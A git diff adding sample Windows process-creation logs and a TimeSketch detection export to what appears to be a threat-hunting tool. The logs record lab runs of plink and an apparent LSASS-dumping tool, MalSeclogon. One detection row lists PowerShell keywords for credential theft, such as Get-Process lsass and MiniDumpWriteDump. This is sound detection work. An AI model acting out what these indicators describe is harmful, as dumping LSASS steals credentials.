+    <Data Name=""NewProcessName"">C:\Windows\System32\smss.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x124</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:01.037541+04:00,1550081101.037541,4688,C:\Windows\System32\rundll32.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:00.997484Z"">
+    </TimeCreated>
+    <EventRecordID>227769</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x410</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x278</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:57.862976+04:00,1550081097.862976,4688,C:\Windows\System32\LogonUI.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:57.672703Z"">
+    </TimeCreated>
+    <EventRecordID>227751</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xc70</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\LogonUI.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x4b8</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:57.672703+04:00,1550081097.672703,4688,C:\Windows\System32\winlogon.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:57.542516Z"">
+    </TimeCreated>
+    <EventRecordID>227750</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x4b8</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x38c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:57.542516+04:00,1550081097.542516,4688,C:\Windows\System32\csrss.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:57.462400Z"">
+    </TimeCreated>
+    <EventRecordID>227749</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x9d4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\csrss.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x38c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:57.462400+04:00,1550081097.4624,4688,C:\Windows\System32\smss.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:04:57.462400Z"">
+    </TimeCreated>
+    <EventRecordID>227748</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x38c</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\smss.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x124</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:04:01.632120+04:00,1550081041.63212,4688,C:\Windows\System32\UI0Detect.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:03:42.664847Z"">
+    </TimeCreated>
+    <EventRecordID>227726</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x934</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\UI0Detect.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x990</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:03:35.734882+04:00,1550081015.734882,4688,C:\Windows\System32\slui.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:03:35.704839Z"">
+    </TimeCreated>
+    <EventRecordID>227721</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xa38</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\slui.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x278</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:03:28.338519+04:00,1550081008.338519,4688,C:\Users\user01\Desktop\plink.exe,user01,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:03:28.318440Z"">
+    </TimeCreated>
+    <EventRecordID>227714</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""SubjectUserName"">user01</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x2ed80</Data>
+    <Data Name=""NewProcessId"">0xcfc</Data>
+    <Data Name=""NewProcessName"">C:\Users\user01\Desktop\plink.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe60</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:02:19.518362+04:00,1550080939.518362,4688,C:\Windows\System32\AtBroker.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:02:05.528246Z"">
+    </TimeCreated>
+    <EventRecordID>227712</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x250</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\AtBroker.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x1d0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:01:47.602470+04:00,1550080907.60247,4688,C:\Windows\System32\TSTheme.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:01:47.562412Z"">
+    </TimeCreated>
+    <EventRecordID>227695</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1fc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\TSTheme.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x278</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:08.723523Z"">
+    </TimeCreated>
+    <EventRecordID>329925</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x24e0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-19</Data>
+    <Data Name=""TargetUserName"">LOCAL SERVICE</Data>
+    <Data Name=""TargetDomainName"">NT AUTHORITY</Data>
+    <Data Name=""TargetLogonId"">0x3e5</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.680005Z"">
+    </TimeCreated>
+    <EventRecordID>329921</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x1494</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-5-18</Data>
+    <Data Name=""TargetUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""TargetDomainName"">WORKGROUP</Data>
+    <Data Name=""TargetLogonId"">0x3e7</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.641209Z"">
+    </TimeCreated>
+    <EventRecordID>329920</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x16e3db3</Data>
+    <Data Name=""NewProcessId"">0x11e4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x17b8</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.619364Z"">
+    </TimeCreated>
+    <EventRecordID>329919</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""7648"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x17b8</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x27c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">IEUser</Data>
+    <Data Name=""TargetDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""TargetLogonId"">0x16e3db3</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\lsass.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.462545Z"">
+    </TimeCreated>
+    <EventRecordID>329916</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">MSEDGEWIN10$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x1bc4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x274</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-16384</Data>
+  </EventData>
+</Event>"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2021-12-07T17:33:01.397814Z"">
+    </TimeCreated>
+    <EventRecordID>329914</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""8692"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3461203602-4096304019-2269080069-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">MSEDGEWIN10</Data>
+    <Data Name=""SubjectLogonId"">0x53ca2</Data>
+    <Data Name=""NewProcessId"">0x21a4</Data>
+    <Data Name=""NewProcessName"">\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x2480</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">-</Data>
+    <Data Name=""TargetDomainName"">-</Data>
+    <Data Name=""TargetLogonId"">0x0</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>2</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2022-05-01T04:42:06.656542Z"">
+    </TimeCreated>
+    <EventRecordID>21374</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""9832"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>wind10.winlab.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">WIND10$</Data>
+    <Data Name=""SubjectDomainName"">WINLAB</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""NewProcessId"">0x1dc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\notepad.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xe8c</Data>
+    <Data Name=""CommandLine""></Data>
+    <Data Name=""TargetUserSid"">S-1-0-0</Data>
+    <Data Name=""TargetUserName"">Administrator</Data>
+    <Data Name=""TargetDomainName"">WINLAB.LOCAL</Data>
+    <Data Name=""TargetLogonId"">0x82215a</Data>
+    <Data Name=""ParentProcessName"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""MandatoryLabel"">S-1-16-12288</Data>
+  </EventData>
+</Event>"
diff --git a/source/samples/Sample_Report.xlsx b/source/samples/Sample_Report.xlsx
new file mode 100644
index 0000000..59cb16f
Binary files /dev/null and b/source/samples/Sample_Report.xlsx differ
diff --git a/source/samples/Sample_TimeSketch.csv b/source/samples/Sample_TimeSketch.csv
new file mode 100644
index 0000000..3d75da3
--- /dev/null
+++ b/source/samples/Sample_TimeSketch.csv
@@ -0,0 +1,41690 @@
+message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel
+powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104,"<?xml version=""1.0"" encoding=""utf-8""?>
